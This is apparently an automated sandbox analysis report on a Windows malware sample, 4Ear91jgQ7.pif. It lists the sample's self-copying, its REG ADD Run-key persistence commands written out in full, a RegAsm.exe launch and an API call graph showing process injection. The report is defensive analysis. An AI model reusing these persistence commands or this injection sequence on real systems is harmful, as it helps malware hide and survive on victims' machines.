                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x980000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:58
                                                            Start time:08:50:42
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0xd10000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:61
                                                            Start time:08:50:47
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2408
                                                            Imagebase:0xa30000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:63
                                                            Start time:08:50:50
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0xa10000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:64
                                                            Start time:08:50:54
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:65
                                                            Start time:08:50:54
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:66
                                                            Start time:08:50:54
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:67
                                                            Start time:08:50:56
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:68
                                                            Start time:08:50:56
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:69
                                                            Start time:08:50:57
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xa00000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:70
                                                            Start time:08:51:04
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
                                                            Imagebase:0x9b0000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:71
                                                            Start time:08:51:10
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:72
                                                            Start time:08:51:10
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:73
                                                            Start time:08:51:10
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:74
                                                            Start time:08:51:12
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:75
                                                            Start time:08:51:12
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:13.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:3.1%
                                                              Total number of Nodes:228
                                                              Total number of Limit Nodes:27
                                                              execution_graph 55661 f5e1f0 DuplicateHandle 55662 f5e286 55661->55662 55698 f5b810 55701 f5b8f8 55698->55701 55699 f5b81f 55702 f5b93c 55701->55702 55703 f5b919 55701->55703 55702->55699 55703->55702 55709 f5bb91 55703->55709 55713 f5bba0 55703->55713 55704 f5b934 55704->55702 55705 f5bb40 GetModuleHandleW 55704->55705 55706 f5bb6d 55705->55706 55706->55699 55710 f5bbb4 55709->55710 55712 f5bbd9 55710->55712 55717 f5aca8 55710->55717 55712->55704 55714 f5bbb4 55713->55714 55715 f5aca8 LoadLibraryExW 55714->55715 55716 f5bbd9 55714->55716 55715->55716 55716->55704 55718 f5bd80 LoadLibraryExW 55717->55718 55720 f5bdf9 55718->55720 55720->55712 55721 647c070 55722 647c08a 55721->55722 55727 647ca92 55722->55727 55735 647cacd 55722->55735 55744 647caa0 55722->55744 55723 647c092 55728 647caa0 55727->55728 55752 647f8ac 55728->55752 55757 647f888 55728->55757 55762 647f8f8 55728->55762 55767 647f778 55728->55767 55772 647f769 55728->55772 55729 647cc09 55729->55723 55737 647cacc 55735->55737 55736 647cc11 55736->55723 55737->55735 55737->55736 55739 647f8ac 13 API calls 55737->55739 55740 647f769 13 API calls 55737->55740 55741 647f778 13 API calls 55737->55741 55742 647f8f8 13 API calls 55737->55742 55743 647f888 13 API calls 55737->55743 55738 647cc09 55738->55723 55739->55738 55740->55738 55741->55738 55742->55738 55743->55738 55745 647cabd 55744->55745 55747 647f8ac 13 API calls 55745->55747 55748 647f769 13 API calls 55745->55748 55749 647f778 13 API calls 55745->55749 55750 647f8f8 13 API calls 55745->55750 55751 647f888 13 API calls 55745->55751 55746 647cc09 55746->55723 55747->55746 55748->55746 55749->55746 55750->55746 55751->55746 55753 647f8ab 55752->55753 55753->55752 55777 647fb80 55753->55777 55783 647fb90 55753->55783 55754 647f97a 55754->55729 55758 647f88d 55757->55758 55760 647fb80 13 API calls 55758->55760 55761 647fb90 13 API calls 55758->55761 55759 647f97a 55759->55729 55760->55759 55761->55759 55763 647f8ab 55762->55763 55765 647fb80 13 API calls 55763->55765 55766 647fb90 13 API calls 55763->55766 55764 647f97a 55764->55729 55765->55764 55766->55764 55768 647f7a2 55767->55768 55770 647fb80 13 API calls 55768->55770 55771 647fb90 13 API calls 55768->55771 55769 647f97a 55769->55729 55770->55769 55771->55769 55773 647f778 55772->55773 55775 647fb80 13 API calls 55773->55775 55776 647fb90 13 API calls 55773->55776 55774 647f97a 55774->55729 55775->55774 55776->55774 55779 647fb90 55777->55779 55778 647fba1 55778->55754 55779->55778 55789 64dfc60 55779->55789 55799 64dfc52 55779->55799 55780 647fc0f 55780->55754 55784 647fbc4 55783->55784 55785 647fba1 55783->55785 55787 64dfc60 13 API calls 55784->55787 55788 64dfc52 13 API calls 55784->55788 55785->55754 55786 647fc0f 55786->55754 55787->55786 55788->55786 55790 64dfc81 55789->55790 55793 64dfc75 55789->55793 55790->55780 55791 64dfecd 55817 64a90ae 55791->55817 55822 64a9210 55791->55822 55828 64a90b8 55791->55828 55792 64dfefb 55792->55780 55793->55790 55793->55791 55809 64a0148 55793->55809 55813 64a0138 55793->55813 55800 64dfc81 55799->55800 55801 64dfc75 55799->55801 55800->55780 55801->55800 55802 64dfecd 55801->55802 55807 64a0148 CreateProcessW 55801->55807 55808 64a0138 CreateProcessW 55801->55808 55804 64a90b8 12 API calls 55802->55804 55805 64a90ae 12 API calls 55802->55805 55806 64a9210 12 API calls 55802->55806 55803 64dfefb 55803->55780 55804->55803 55805->55803 55806->55803 55807->55802 55808->55802 55810 64a016b 55809->55810 55811 64a021f 55810->55811 55833 64a02cf 55810->55833 55811->55791 55814 64a0148 55813->55814 55815 64a021f 55814->55815 55816 64a02cf CreateProcessW 55814->55816 55815->55791 55816->55815 55818 64a90b8 55817->55818 55819 64a9200 55818->55819 55879 64a95e8 55818->55879 55883 64a95f8 55818->55883 55819->55792 55823 64a91e9 55822->55823 55824 64a9222 55822->55824 55826 64a95e8 12 API calls 55823->55826 55827 64a95f8 12 API calls 55823->55827 55825 64a9200 55825->55792 55826->55825 55827->55825 55829 64a90dc 55828->55829 55830 64a9200 55829->55830 55831 64a95e8 12 API calls 55829->55831 55832 64a95f8 12 API calls 55829->55832 55830->55792 55831->55830 55832->55830 55834 64a0305 55833->55834 55838 64a0390 55834->55838 55843 64a03a0 55834->55843 55835 64a0326 55835->55811 55839 64a03a0 55838->55839 55840 64a0428 55839->55840 55848 64a2788 55839->55848 55852 64a2820 55839->55852 55840->55835 55844 64a03b5 55843->55844 55845 64a0428 55844->55845 55846 64a2788 CreateProcessW 55844->55846 55847 64a2820 CreateProcessW 55844->55847 55845->55835 55846->55845 55847->55845 55849 64a278d 55848->55849 55857 64a42a9 55849->55857 55850 64a2809 55850->55840 55853 64a282a 55852->55853 55854 64a27cf 55852->55854 55853->55840 55856 64a42a9 CreateProcessW 55854->55856 55855 64a2809 55855->55840 55856->55855 55863 64a42dd 55857->55863 55858 64a44aa 55858->55850 55859 64a4419 55859->55858 55860 64a83cd CreateProcessW 55859->55860 55861 64a8312 CreateProcessW 55859->55861 55862 64a8320 CreateProcessW 55859->55862 55860->55858 55861->55858 55862->55858 55863->55858 55863->55859 55867 64a83cd 55863->55867 55871 64a8312 55863->55871 55875 64a8320 55863->55875 55869 64a83d4 55867->55869 55868 64a843a 55868->55859 55869->55868 55870 64a6bd8 CreateProcessW 55869->55870 55870->55868 55872 64a8320 55871->55872 55873 64a6bd8 CreateProcessW 55872->55873 55874 64a843a 55872->55874 55873->55874 55874->55859 55876 64a834b 55875->55876 55877 64a6bd8 CreateProcessW 55876->55877 55878 64a843a 55876->55878 55877->55878 55878->55859 55880 64a963a 55879->55880 55881 64a960d 55879->55881 55880->55819 55881->55880 55887 64ab45f 55881->55887 55884 64a963a 55883->55884 55885 64a960d 55883->55885 55884->55819 55885->55884 55886 64ab45f 12 API calls 55885->55886 55886->55884 55889 64ab4a0 55887->55889 55888 64abd66 55888->55880 55889->55888 55894 64aa648 Wow64SetThreadContext 55889->55894 55897 64aa658 Wow64SetThreadContext 55889->55897 55900 64aacee WriteProcessMemory 55889->55900 55901 64aacf0 WriteProcessMemory 55889->55901 55902 64ab090 55889->55902 55907 64ab0a0 55889->55907 55912 64aae30 55889->55912 55917 64aae20 55889->55917 55923 64aab20 55889->55923 55929 64aab30 55889->55929 55934 64a47a0 55889->55934 55939 64a4790 55889->55939 55894->55889 55897->55889 55900->55889 55901->55889 55903 64ab0ae 55902->55903 55904 64ab0ce 55902->55904 55903->55889 55904->55903 55905 64ab2d6 CreateProcessA 55904->55905 55906 64ab333 55905->55906 55908 64ab0ae 55907->55908 55909 64ab0ce 55907->55909 55908->55889 55909->55908 55910 64ab2d6 CreateProcessA 55909->55910 55911 64ab333 55910->55911 55913 64aae3e 55912->55913 55914 64aae5e ReadProcessMemory 55912->55914 55913->55889 55916 64aaf07 55914->55916 55916->55889 55918 64aae00 55917->55918 55920 64aae2a 55917->55920 55918->55889 55919 64aae3e 55919->55889 55920->55919 55921 64aaed6 ReadProcessMemory 55920->55921 55922 64aaf07 55921->55922 55922->55889 55924 64aaac6 55923->55924 55926 64aab2e 55923->55926 55924->55889 55925 64aab41 55925->55889 55926->55925 55927 64aabca VirtualAllocEx 55926->55927 55928 64aabfd 55927->55928 55928->55889 55930 64aab41 55929->55930 55931 64aab64 VirtualAllocEx 55929->55931 55930->55889 55933 64aabfd 55931->55933 55933->55889 55935 64a47b1 55934->55935 55936 64a47d4 ResumeThread 55934->55936 55935->55889 55938 64a4861 55936->55938 55938->55889 55940 64a47b1 55939->55940 55941 64a47d4 ResumeThread 55939->55941 55940->55889 55943 64a4861 55941->55943 55943->55889 55663 64a8d00 55664 64a8d4c WaitForInputIdle 55663->55664 55666 64a8d92 55664->55666 55667 f5dfa8 55668 f5dfee GetCurrentProcess 55667->55668 55670 f5e040 GetCurrentThread 55668->55670 55671 f5e039 55668->55671 55672 f5e076 55670->55672 55673 f5e07d GetCurrentProcess 55670->55673 55671->55670 55672->55673 55674 f5e0b3 GetCurrentThreadId 55673->55674 55676 f5e10c 55674->55676 55677 f54528 55678 f5453c 55677->55678 55679 f5454a 55678->55679 55681 f54b08 55678->55681 55682 f54b2d 55681->55682 55686 f55020 55682->55686 55690 f55010 55682->55690 55688 f55047 55686->55688 55687 f55124 55688->55687 55694 f5450c 55688->55694 55691 f55047 55690->55691 55692 f5450c CreateActCtxA 55691->55692 55693 f55124 55691->55693 55692->55693 55695 f560b0 CreateActCtxA 55694->55695 55697 f56173 55695->55697 55697->55697

                                                              Executed Functions

                                                              Function 064D6858 Relevance: 26.2, Strings: 20, Instructions: 1240COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $kq$,gq$,gq$4ccq$4ccq$hkq$hkq$hkq$|bdq$|bdq$|bdq$#"$$cq$$cq$$cq$S $ccq$ccq$ccq$ccq
                                                              • API String ID: 0-3301557462
                                                              • Opcode ID: 406bc90e8727d5520e5494e7eb0bcfa8e3beced35bf559bb3126b7e4f7dca7e6
                                                              • Instruction ID: a884967755a8817b474ab0a005c132ac006931ea48036296cfdce186f2cd779d
                                                              • Opcode Fuzzy Hash: 406bc90e8727d5520e5494e7eb0bcfa8e3beced35bf559bb3126b7e4f7dca7e6
                                                              • Instruction Fuzzy Hash: E7B24C74B002148FDB65DF29C9A4A6AB7F2FF89310F1585AAE50ADB3A1DB30DC41CB51
                                                              Function 0647ED18 Relevance: 8.0, Strings: 6, Instructions: 489COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1411 647ed18-647ed37 call 647e928 1414 647ed3d-647ed40 1411->1414 1415 647ed39-647ed3b 1411->1415 1416 647ed43-647ed46 1414->1416 1415->1416 1417 647edd1-647ede4 1416->1417 1418 647ed4c-647ed4f 1416->1418 1423 647ede6-647edf0 1417->1423 1424 647edfb-647edfd 1417->1424 1418->1417 1419 647ed55-647ed60 1418->1419 1421 647edc5-647edce 1419->1421 1422 647ed62-647ed73 1419->1422 1432 647ed75-647ed77 1422->1432 1433 647ed79-647ed7c 1422->1433 1425 647edf2-647edf4 1423->1425 1426 647ee1f-647ee7c 1423->1426 1428 647edfe-647ee06 1424->1428 1429 647eee9-647ef63 1424->1429 1430 647ee84-647eee1 1425->1430 1431 647edfa 1425->1431 1426->1430 1434 647ee1a 1428->1434 1435 647ee08-647ee0b 1428->1435 1438 647ef6b-647ef94 1429->1438 1430->1429 1431->1424 1436 647ed7f-647ed87 1432->1436 1433->1436 1434->1426 1437 647ee11-647ee19 1435->1437 1435->1438 1436->1417 1441 647ed89-647ed94 1436->1441 1449 647ef96-647ef9c 1438->1449 1450 647efad-647f066 1438->1450 1441->1417 1451 647ed96 1441->1451 1449->1450 1454 647ef9e-647efac 1449->1454 1486 647f070-647f078 1450->1486 1459 647ed9e-647edbe 1451->1459 1459->1417 1472 647edc0-647edc3 1459->1472 1472->1421 1472->1422 1487 647f07b-647f080 1486->1487 1488 647f086-647f091 1487->1488 1489 647f22b-647f2b7 call 647ab7c 1487->1489 1488->1487 1490 647f093-647f095 1488->1490 1521 647f2ba-647f2d2 1489->1521 1491 647f098-647f0a9 1490->1491 1495 647f0b5-647f0b8 1491->1495 1496 647f0ab-647f0ad 1491->1496 1498 647f226 1495->1498 1500 647f0be-647f0c1 1495->1500 1496->1498 1499 647f0b3 1496->1499 1498->1489 1499->1500 1500->1489 1501 647f0c7-647f0d7 1500->1501 1501->1489 1503 647f0dd-647f0f3 1501->1503 1503->1489 1505 647f0f9-647f118 1503->1505 1505->1491 1507 647f11e-647f131 1505->1507 1508 647f1ff-647f20a 1507->1508 1509 647f20c 1508->1509 1510 647f21b-647f225 1508->1510 1512 647f136-647f148 1509->1512 1513 647f212-647f215 1509->1513 1512->1489 1515 647f14e-647f164 1512->1515 1513->1510 1513->1512 1515->1489 1516 647f16a-647f187 1515->1516 1518 647f195-647f199 1516->1518 1519 647f189-647f18d 1516->1519 1518->1498 1520 647f19f-647f1a8 1518->1520 1519->1498 1522 647f193 1519->1522 1520->1489 1523 647f1ae-647f1d1 1520->1523 1526 647f2e4-647f2e6 1521->1526 1527 647f2d4-647f2de 1521->1527 1522->1520 1523->1489 1525 647f1d3-647f1e7 1523->1525 1525->1489 1530 647f1e9-647f1fc 1525->1530 1526->1521 1528 647f2e8-647f30e 1526->1528 1527->1526 1533 647f310 1528->1533 1534 647f319 1528->1534 1530->1508 1533->1534 1535 647f31a 1534->1535 1535->1535
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hgq$Hgq$Hgq$Hgq$Tecq$Tecq
                                                              • API String ID: 0-365889919
                                                              • Opcode ID: 7a27ce48b33e052380fba7973b82d77501aeebd7d8ab76f71ec39cd747f3828e
                                                              • Instruction ID: 2d4fb00c5d4eb70f8d687d96b99d73b82806e0ea2700fe9ea47a0fd0669ab1d8
                                                              • Opcode Fuzzy Hash: 7a27ce48b33e052380fba7973b82d77501aeebd7d8ab76f71ec39cd747f3828e
                                                              • Instruction Fuzzy Hash: 7602B574E041498FCB85DFA8C9906FEBBB2FF89310F1585AAD405AB391CB349D45CBA1
                                                              Function 064A89C4 Relevance: 1.7, APIs: 1, Instructions: 221processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3180 64a89c4-64a8a44 3182 64a8a4f-64a8a56 3180->3182 3183 64a8a46-64a8a4c 3180->3183 3184 64a8a58-64a8a5e 3182->3184 3185 64a8a61-64a8a68 3182->3185 3183->3182 3184->3185 3186 64a8a6a-64a8a86 3185->3186 3187 64a8a87-64a8a8b 3185->3187 3186->3187 3188 64a8aab-64a8abb 3187->3188 3189 64a8a8d-64a8aa3 3187->3189 3190 64a8ada-64a8ade 3188->3190 3191 64a8abd-64a8ad9 3188->3191 3189->3188 3192 64a8aff-64a8b18 3190->3192 3193 64a8ae0-64a8af7 3190->3193 3191->3190 3194 64a8b1a-64a8b23 3192->3194 3195 64a8b26-64a8b2f 3192->3195 3193->3192 3194->3195 3196 64a8b4a-64a8b4e 3195->3196 3197 64a8b31-64a8b48 3195->3197 3198 64a8b69-64a8b7d 3196->3198 3199 64a8b50-64a8b61 3196->3199 3197->3196 3200 64a8b7f 3198->3200 3201 64a8b82-64a8bd1 CreateProcessW 3198->3201 3199->3198 3200->3201 3202 64a8bda-64a8c0b 3201->3202 3203 64a8bd3-64a8bd9 3201->3203 3206 64a8c0d-64a8c11 3202->3206 3207 64a8c20-64a8c24 3202->3207 3203->3202 3206->3207 3208 64a8c13-64a8c16 3206->3208 3209 64a8c39-64a8c3d 3207->3209 3210 64a8c26-64a8c2a 3207->3210 3208->3207 3211 64a8c3f-64a8c43 3209->3211 3212 64a8c52-64a8c56 3209->3212 3210->3209 3213 64a8c2c-64a8c2f 3210->3213 3211->3212 3214 64a8c45-64a8c48 3211->3214 3215 64a8c58-64a8c64 3212->3215 3216 64a8c67 3212->3216 3213->3209 3214->3212 3215->3216 3218 64a8c68 3216->3218 3218->3218
                                                              APIs
                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 064A8BC1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: acbcd9e579b08ba89d34ed39c8fd547eeaa15abde853f92f0aa3ea07d10cec91
                                                              • Instruction ID: c56c58082a46f55b0628004a15176b1822123ef109d3791e016ff9173a7518f2
                                                              • Opcode Fuzzy Hash: acbcd9e579b08ba89d34ed39c8fd547eeaa15abde853f92f0aa3ea07d10cec91
                                                              • Instruction Fuzzy Hash: A091F5B1D00309AFDB55CFA9C844BDEBBB2EF98300F24822AE415AB290D7709945CF51
                                                              Function 064A6BD8 Relevance: 1.7, APIs: 1, Instructions: 218processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3219 64a6bd8-64a8a44 3222 64a8a4f-64a8a56 3219->3222 3223 64a8a46-64a8a4c 3219->3223 3224 64a8a58-64a8a5e 3222->3224 3225 64a8a61-64a8a68 3222->3225 3223->3222 3224->3225 3226 64a8a6a-64a8a86 3225->3226 3227 64a8a87-64a8a8b 3225->3227 3226->3227 3228 64a8aab-64a8abb 3227->3228 3229 64a8a8d-64a8aa3 3227->3229 3230 64a8ada-64a8ade 3228->3230 3231 64a8abd-64a8ad9 3228->3231 3229->3228 3232 64a8aff-64a8b18 3230->3232 3233 64a8ae0-64a8af7 3230->3233 3231->3230 3234 64a8b1a-64a8b23 3232->3234 3235 64a8b26-64a8b2f 3232->3235 3233->3232 3234->3235 3236 64a8b4a-64a8b4e 3235->3236 3237 64a8b31-64a8b48 3235->3237 3238 64a8b69-64a8b7d 3236->3238 3239 64a8b50-64a8b61 3236->3239 3237->3236 3240 64a8b7f 3238->3240 3241 64a8b82-64a8bd1 CreateProcessW 3238->3241 3239->3238 3240->3241 3242 64a8bda-64a8c0b 3241->3242 3243 64a8bd3-64a8bd9 3241->3243 3246 64a8c0d-64a8c11 3242->3246 3247 64a8c20-64a8c24 3242->3247 3243->3242 3246->3247 3248 64a8c13-64a8c16 3246->3248 3249 64a8c39-64a8c3d 3247->3249 3250 64a8c26-64a8c2a 3247->3250 3248->3247 3251 64a8c3f-64a8c43 3249->3251 3252 64a8c52-64a8c56 3249->3252 3250->3249 3253 64a8c2c-64a8c2f 3250->3253 3251->3252 3254 64a8c45-64a8c48 3251->3254 3255 64a8c58-64a8c64 3252->3255 3256 64a8c67 3252->3256 3253->3249 3254->3252 3255->3256 3258 64a8c68 3256->3258 3258->3258
                                                              APIs
                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 064A8BC1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: e7609e34c7616cd8a042119ca413d1a51f336f34905c04e8b2489f3a5046d00b
                                                              • Instruction ID: 2ffd5440ed5e29acc5a24699a798db7a4f42d2345b8a9e63d492f019b2ef0eaf
                                                              • Opcode Fuzzy Hash: e7609e34c7616cd8a042119ca413d1a51f336f34905c04e8b2489f3a5046d00b
                                                              • Instruction Fuzzy Hash: 1D91E5B1D00319EFDB55CFA9C84479EBBF2EF98300F24862AE415AB290D774A945CF91
                                                              Function 064D4DB0 Relevance: 1.7, Strings: 1, Instructions: 432COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
